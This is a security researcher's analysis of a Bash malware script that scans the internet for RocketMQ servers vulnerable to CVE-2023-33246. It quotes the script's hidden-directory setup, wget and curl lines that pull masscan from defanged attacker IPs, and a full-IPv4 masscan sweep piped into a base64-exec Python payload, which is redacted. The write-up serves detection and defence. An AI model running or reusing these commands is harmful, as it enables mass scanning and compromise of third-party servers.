A few months ago, RocketMQ[1], a real-time message queue platform, suffered of a nasty vulnerability referred as CVE-2023-33246. I found another malicious script in the wild a few weeks ago that exploits this vulnerability. It has still today a very low VirusTotal detection score:2/60 [2] (SHA256:70710c630390dbf74a97162ab61aae78d3e18eacb41e16d3dd6bbd872fee66c5).

This script is a Bash script has two main parts: First, it will prepare its environment by creating a random directory:

rand=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c $(shuf -i 4-16 -n 1) ; echo ''); if [ -z ${rand} ]; then rand='.tmp'; fi
echo "${rand}" > "$(pwd)/.${rand}" 2>/dev/null && LPATH="$(pwd)/.cache/"; ${rm} -f "$(pwd)/.${rand}" >/dev/null 2>&1
echo "${rand}" > "/tmp/.${rand}" 2>/dev/null && LPATH="/tmp/.cache/"; ${rm} -f "/tmp/.${rand}" >/dev/null 2>&1
echo "${rand}" > "/usr/local/bin/.${rand}" 2>/dev/null && LPATH="/usr/local/bin/.cache/"; ${rm} -f "/usr/local/bin/.${rand}" >/dev/null 2>&1
echo "${rand}" > "${HOME}/.${rand}" 2>/dev/null && LPATH="${HOME}/.cache/"; ${rm} -f "${HOME}/.${rand}" >/dev/null 2>&1
mkdir -p ${LPATH} >/dev/null 2>&1

Then, it will install some dependencies using yum or apt. The dependencies will allow the tool to download and compile on the fly a copy of the masscan[3] port scanner:

if [ ! -d ${LPATH}masscan ]; then
        echo "Downloading masscan.tar.gz.."
        wget -qO ${LPATH}masscan.tar.gz hxxp://149[.]28[.]85[.]17:80/wp-content/themes/twentyseventeen/masscan.tar.gz
        tar -C ${LPATH} -zxf ${LPATH}masscan.tar.gz
        rm ${LPATH}masscan.tar.gz
        make clean -C ${LPATH}masscan >/dev/null 2>&1
        make -C ${LPATH}masscan >/dev/null 2>&1
        masscan=${LPATH}masscan/bin/masscan
elif [ -f ${LPATH}masscan/bin/masscan ]; then
        echo "Masscan existed already in ${LPATH}"
        masscan=${LPATH}masscan/bin/masscan
else
        if [ ! -f ${LPATH}.masscan ]; then
                curl --retry 5 -sLk hxxp://203[.]55[.]135[.]12/wp-content/themes/twentyfifteen/masscan -o ${LPATH}.masscan
                chmod 755 ${LPATH}.masscan
                masscan=${LPATH}.masscan
        fi

        if [[ "" == "${masscan}" ]]; then
                exit
        fi
fi

Masscan is very powerfull to quickly scan the complete IPv4 address space for a specific port. That's what the script does. It scan the Internet and searches for the following open ports: 10911,10909. These are used by RocketMQ. The masscan results will be passed to a Python script using a pipe:

${sudo} ${masscan} --shard 17/20 --rate 30000 --exclude-range 255.255.255.255 -p10911,10909 0.0.0.0/0 | python3 -c "import base64;exec(base64.b64decode('...redatcted...'))"

The Python script has been redacted but, for every IP reported by masscan, it starts a thread to try to exploit the server. 

Something funny I found in the Python script: The attacker reused (or forked) the code because it also contains other exploits:

remnux@remnux:/MalwareZoo/20231216$ grep module_ payload.py 
    def ZZZZmodule_scan_bigip(self, ip, port):
    def ZZZZmodule_scan_webmin(self, ip, port):
    def module_scan_rocketmq(self, ip, port):
    def ZZZmodule_scan_wordpress(self, ip, port):
    def ZZZZmodule_scan_webuzo(self, ip, port):

The one starting with "ZZZ" have been disabled.

[1] https://rocketmq.apache.org
[2] https://www.virustotal.com/gui/file/70710c630390dbf74a97162ab61aae78d3e18eacb41e16d3dd6bbd872fee66c5/detection
[3] https://github.com/robertdavidgraham/masscan

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key